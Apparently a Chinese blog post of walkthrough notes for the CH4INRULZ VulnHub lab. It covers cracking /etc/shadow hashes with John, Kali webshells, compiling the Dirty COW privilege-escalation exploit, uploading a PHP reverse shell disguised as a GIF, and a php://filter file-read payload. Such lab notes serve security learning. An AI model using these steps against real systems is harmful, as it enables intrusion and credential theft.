二 CH4INRULZ_v1.0.1

1 john暴破密码

讲账号,更改为/etc/passwd的账号格式,。例如破解kali下的账号密码

第一步:unshadow /etc/passwd /etc/shadow > shadow_test

第二部:john shadow_test

便可以破解账号,如果破解过一次,可以使用john –show shadow_test 查看结果,或者查看~/.john/john.pot查看破解过的密码。

如果账号获取到的内容为“frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0”,模仿、/etc/passwd文件中的格式

Echo “frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0:1000:1000:frank,,,:/home/frank:/bin/bash” > test

John test

2kali自带webshell

/usr/share/webshells/

3脏牛提权

Linux kernel >= 2.6.22(2007年发行,到2016年10月18日才修复

https://github.com/FireFart/dirtycow

编译执行

 gcc -pthread dirty.c -o dirty -lcrypt

4gif上传法

Content-Disposition: form-data; name="fileToUpload"; filename="shell.gif"

Content-Type: image/gif

GIF98<?php

// php-reverse-shell - A Reverse Shell implementation in PHP

// Copyright (C) 2007 pentestmonkey@pentestmonkey.net

上述红色位置,GIF98 加在文件头位置。

5 php://filter

file=php://filter/convert.base64-encode/resource=files_api.php

6 在kali上设置简单的HTTP服务器

python -m SimpleHttpServer 80

二 CH4INRULZ_v1.0.1相关推荐

  1. 【ICPC-283】hdu 2126 Buy the souvenirs(二维0/1背包)

    点击打开链接hdu2126 思路: 二维0/1背包 分析: 1 题目给定n个物品的价钱和m的钱,问最多能买到的物品数有几种方案. 2 很明显就可以写出状态转移方程dp[i][j][k]表示的是前i个物 ...

  2. VulnHub靶场之CH4INRULZ_v1.0.1

    下载地址:http%3A//download.vulnhub.com/ch4inrulz/CH4INRULZ_v1.0.1.ova 主机发现 netdiscover -i eth0 -r 192.16 ...

  3. 估算带卷积核二分类0,3的网络的收敛时间和迭代次数

    制作一个网络分类minst的0和3求出这网络的迭代次数曲线表达式n(δ),和准确率表达式p-max(δ),用预期准确率去估算n,并推算需要的时间. 将minst的28*28的图片缩小到9*9,网络用一 ...

  4. 十年IT运维谈(二)“0”和“100”

    "很多时候,极限状态都是不可取的.一无所有的'0'和极尽完满的'100'都不见得是发展历程中最有利的状态." 经过这些年的沉淀,我们看到,这个市场在逐步地走向规范,用户的需求开始显 ...

  5. 超级账本Fabric学习(二)Fabric1.0.0网络搭建(中)无业务逻辑处理的Fabric网络

    整合三个有依赖关系的yaml文件 1:docker-compose-cli.yaml文件源码解析 2:docker-compose-base.yaml文件源码分析 3:peer-base.yaml文件 ...

  6. 千分之二手续费0.2费率微信支付商户号申请

    开通准备资料: 1.营业执照照片 2.法人身份证照片正面.背面 3.开户行信息,对公账号或个人银行卡(开户行.卡号.开户地.分支行) 4.客服电话.邮箱 5.微信公众号或微信小程序appid 开通流程 ...

  7. USB 之二 USB2.0 规范详解 第二部分

    注意 对于物理特性仅做简单说明 主要是针对 USB 2.0 规范的第九章.第十章和第十一章.之前章节见后续见 第一部分 下面的举例报文为使用Bus Hound监听的U盘插入时的报文,报文见后文附件. ...

  8. 靶场渗透CH4INRULZ_v1.0.1

    最新文章见我个人博客:点此 靶机环境下载地址:[下载] ova下载下来后直接导入virtualbox即可(https://www.vulnhub.com/entry/ch4inrulz-101,247 ...

  9. 生产环境mysql安装规划及调优实践(二)--mysql8.0.29为例

    上一篇讲了如何安装mysql,这一篇讲一下主从复制的设置,以及生产常用的参数设置. 因为mysql的生产使用场景不同,所以不同的使用场景下,参数配置也要针对不同的业务来进行设置.比如是倾向于快速更新, ...

最新文章

  1. Iterator(迭代器)的一般用法
  2. KafkaOffsetMonitor 安装
  3. ELK 环境搭建1-Elasticsearch
  4. Eclipse插件CheckStyle的安装和使用
  5. C语言鸡尾酒排序cocktail sort算法(附完整源码)
  6. [Flashback]开启数据库闪回数据库功能
  7. CentOS安装scrot记
  8. Javascript图像处理——图像形态学
  9. 数组去重的JavaScript实现
  10. 论文阅读|How Does Batch Normalizetion Help Optimization
  11. lightning接口_苹果、安卓充电接口有望统一,欧盟重压下,苹果将不得不妥协
  12. 【软件开发】软件开发注意事项
  13. OpManager-企业网络问题分析及故障排除
  14. impala常用函数大全(超详细哦)
  15. 几种网赚项目引流的方法
  16. 计算机房面积设置气消条件,机房消防设计方案
  17. 什么是软件危机?它有哪些典型表现?为什么会出现软件危机?
  18. 网络请求及各类错误代码含义总结(包含AFN错误码大全)
  19. 鞋子微商怎么做qq引流?微商如何通过QQ空间引流
  20. 关于element upload上传时额外参数的问题

热门文章

  1. 【eNSP 华为模拟器】单臂路由及操作步骤【图文】
  2. STM8L低功耗HALT模式一些总结
  3. 无线网络基础知识要点概括
  4. 布尔表达式和正则表达式_简化布尔表达式的实例
  5. textView 文字居上
  6. defy手机突然搜索不到wifi信号的问题
  7. 数据分析--01股票分析
  8. (二十二)岁月无声 - 1
  9. 三种前端实现VR全景看房的方案!说不定哪天就用得上!
  10. 黑帽python第二版(Black Hat Python 2nd Edition)读书笔记 之 第十一章 攻击性取证